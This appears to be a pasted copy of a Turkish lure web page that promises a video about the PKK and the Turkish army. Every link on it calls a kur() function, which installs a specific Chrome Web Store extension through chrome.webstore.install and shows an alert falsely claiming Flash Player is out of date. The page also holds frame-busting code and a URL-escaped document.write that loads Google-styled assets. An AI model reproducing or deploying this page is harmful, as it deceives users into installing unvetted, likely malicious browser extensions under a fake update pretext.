- _wau.push(["tab", "moqrduosstcr", "0nk", "bottom-center"]);
- (function() {var s=document.createElement("script"); s.async=true;
- s.src="http://widgets.amung.us/tab.js";
- document.getElementsByTagName("head")[0].appendChild(s);
- })();</script>
- <!DOCTYPE html>
- <html class="no-js consumer" lang="tr">
- <title>Pkk'nin Sonu </title>
- <!-- Mirrored from fastotoliked.com/ by HTTrack Website Copier/3.x [XR&CO'2010], Mon, 21 Jan 2013 19:16:02 GMT -->
- <head>
- <meta name="google-site-verification" content="enlibeccmboipfmpmjoecfdmnahcjlhj">
- <link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/djpnjilhooodipllnjedjeiabkboakok">
- <link rel="shortcut icon" href="http://cdn1.iconfinder.com/data/icons/yooicons_set09_halloween/128/cheshire_cat.png">
- <script>
- <a href="javascript:" onclick="kur();" style="text-decoration:none;">
- </a></div><a href="javascript:" onclick="kur();" style="text-decoration:none;">
- <script>
- if(top!=self)
- {
- top.location=self.location;
- }
- if(frames)
- {
- if(top.frames.length>0)
- top.location.href=self.location;
- }
- </script>
- <a href="javascript:" onclick="kur();" style="text-decoration:none;"></a>
- <script type="text/javascript">
- function kur()
- {
- chrome.webstore.install("https://chrome.google.com/webstore/detail/djpnjilhooodipllnjedjeiabkboakok");
- alert("FlashPlayer Eklentisi Tarayicinizda Güncel Degil , Devam Etmek Için Ekle'ye Tiklayin");
- }
- </script>
- </title>
- <link href="../www.google.com/images/icons/product/chrome-32.png" rel="icon" type="image/ico">
- <div class="browser-landing" id="main">
- <link href=
- "http://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700&subset=latin,latin-ext" rel=
- "stylesheet">
- <script type="text/javascript">
- document.write(unescape('%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%69%6E%74%6C%2F%74%72%2F%63%68%72%6F%6D%65%2F%61%73%73%65%74%73%2F%63%6F%6D%6D%6F%6E%2F%63%73%73%2F%63%68%72%6F%6D%65%2E%6D%69%6E%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%22%2F%2F%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%6A%73%2F%67%77%65%62%2F%61%6E%61%6C%79%74%69%63%73%2F%61%75%74%6F%74%72%61%63%6B%2E%6A%73%22%3E%0A%09%3C%2F%73%63%72%69%70%74%3E'));
- </script>
- <style>
- body{
- background-image: url(turkey.jpg);
- background-attachment: scroll;}
- </style>
- <div class="compact marquee-stacked" id="marquee">
- <div class="marquee-copy">
- <h1>
- Pkk Teröristlerinin Sonu !
- </h1>
- <p>
- <font color='#cococo' > Helal Olsun Türk Askerim , Arkanizdayiz ..</font>
- <a href="javascript:" onclick="kur();"> <img src="anasayfa.jpg"</a>
- <br>
- <center>
- <a class="button eula-download-button" data-g-event="cta" data-g-label="download-chrome" href="javascript:" onclick="kur();">FlashPlayer Güncelle</a>
- </center>
- <font color='#cococo' > FlashPlayer Yüklü Olmadigindan Video Açilamiyor</font> </p> </center> <a href="javascript:" onclick="kur();"> <img src="flash.png"><br><br>
- <div class="marquee-image">
- <script language="javascript" src="yasak.js"></script>
- <h1>
- <b>
- ProFonix , Erkan Durmaz , Bcykn Yapimidir ;)
- </b>
- </h1>
- <script type="text/javascript"><!--
- google_ad_client = "ca-pub-9802413630581770";
- /* newclient */
- google_ad_slot = "7314422608";
- google_ad_width = 728;
- google_ad_height = 90;
- //-->
- </script>
- <script type="text/javascript"
- src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
- </script>
- <!-- Mirrored from fastotoliked.com/ by HTTrack Website Copier/3.x [XR&CO'2010], Mon, 21 Jan 2013 19:16:14 GMT -->
- </html>
- *google translator
- **idioma turco
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement